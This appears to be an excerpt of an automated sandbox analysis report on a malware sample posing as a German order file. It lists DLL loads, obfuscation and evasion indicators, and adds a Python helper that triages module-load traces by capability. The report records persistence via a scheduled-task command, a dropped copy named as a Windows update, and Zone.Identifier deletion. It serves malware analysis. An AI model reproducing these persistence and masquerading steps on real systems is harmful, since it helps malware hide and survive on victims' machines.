                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                Source: Window Recorder Window detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: Bestellung - 021224 - 901003637.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Bestellung - 021224 - 901003637.exe Static PE information: Virtual size of .text is bigger than: 0x100000
                Source: Bestellung - 021224 - 901003637.exe Static file information: File size 3842568 > 1048576
                Source: Bestellung - 021224 - 901003637.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3a1a00
                Source: Bestellung - 021224 - 901003637.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
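The "Section loaded" entries above are the raw module-load trace for every process in the run, one line per DLL. Each new process instance is recognizable by a fresh kernel.appcore.dll load, and the capability of an instance is readable from the DLL clusters it pulls in: mscoree.dll for the CLR, amsi.dll once managed code runs, mswsock.dll/dnsapi.dll/winhttp.dll for networking, schannel.dll and ncryptsslp.dll for TLS, taskschd.dll for the Task Scheduler, wbemcomn.dll/mi.dll for WMI. The Python below is an added triage helper, not part of the Joe Sandbox report: it parses lines of this shape (including the run-together "exeSection loaded:" form), splits them into per-process instances and tags each instance with the clusters its DLLs imply. The sample lines are constructed to mirror the report; the marker sets are the author's heuristics, not a complete mapping.

```python
import re

# One report line; tolerates the run-together "...exeSection loaded:" form.
LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*Section loaded:\s*(?P<dll>[\w.\-]+)",
    re.IGNORECASE,
)

# Heuristic DLL clusters (author's choice, not an exhaustive mapping).
CAPABILITY_MARKERS = {
    "clr": {"mscoree.dll", "vcruntime140_clr0400.dll"},
    "amsi": {"amsi.dll"},
    "network": {"mswsock.dll", "dnsapi.dll", "iphlpapi.dll", "winhttp.dll", "wininet.dll", "webio.dll"},
    "tls": {"schannel.dll", "ncryptsslp.dll", "mskeyprotect.dll"},
    "task_scheduler": {"taskschd.dll"},
    "wmi": {"wbemcomn.dll", "wmidcom.dll", "mi.dll"},
}


def parse_section_loaded(lines):
    """Yield (process_path, dll_name) for every 'Section loaded' line."""
    for line in lines:
        m = LINE_RE.search(line)
        if m:
            yield m.group("proc"), m.group("dll").lower()


def split_instances(records):
    """Group consecutive records into process instances.

    A new instance starts when the process path changes or when
    kernel.appcore.dll, which every process loads once early on, appears again.
    """
    instances, cur = [], None
    for proc, dll in records:
        if cur is None or proc != cur["process"] or (dll == "kernel.appcore.dll" and dll in cur["dlls"]):
            cur = {"process": proc, "dlls": []}
            instances.append(cur)
        cur["dlls"].append(dll)
    return instances


def classify(instance):
    """Tag one instance with the capability clusters its loaded DLLs imply."""
    loaded = set(instance["dlls"])
    caps = sorted(name for name, markers in CAPABILITY_MARKERS.items() if loaded & markers)
    return {"process": instance["process"], "dll_count": len(loaded), "capabilities": caps}


def triage(lines):
    return [classify(i) for i in split_instances(parse_section_loaded(lines))]


# Constructed sample in the report's format (not copied from the run above).
SAMPLE_REPORT = r"""
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_REPORT.splitlines()):
        print(row)
```

Run against the full list above, the outlooks.exe instance that loads mswsock.dll, dnsapi.dll, schannel.dll, ncryptsslp.dll and winhttp.dll is the only one that opens the socket and TLS stacks, so it is the instance to pair with the network section of this report; the other outlooks.exe instances only bootstrap the CLR, UI and crypto providers.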

                Data Obfuscation

                Source: 0.2.Bestellung - 021224 - 901003637.exe.7920000.2.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Bestellung - 021224 - 901003637.exe.4211d80.0.raw.unpack, L2.cs .Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe Code function: 0_2_09803CD2 push FFFFFF8Bh; ret 0_2_09803CD4
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Code function: 15_2_08864DB0 push eax; iretd 15_2_08864DBD
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe File created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe File created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe

                Boot Survival

                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe File opened: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe File opened: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe File opened: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe:Zone.Identifier read attributes | delete
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX (84 identical entries)

                Malware Analysis System Evasion

                Source: Yara match; File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
                Source: Yara match; File source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: FC0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 29F0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 2810000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 5060000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 6060000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 6190000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 7190000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: A7C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 9D50000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: B7C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: C7C0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 16D0000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 3190000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe; Memory allocated: 1770000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 2510000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 2660000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 4660000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 4D40000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 5D40000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 5E70000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 6E70000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 9120000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: A120000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe; Memory allocated: 61E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 3170000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 3380000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 3170000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 5980000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 6980000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 6AB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 7AB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 9D60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: AD60000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 6E20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 3100000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 33B0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 3100000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 58F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 68F0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 6A20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 7A20000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 9D50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: AD50000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 6D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 18D0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe; Memory allocated: 33B0000 memory reserve | memory write watch
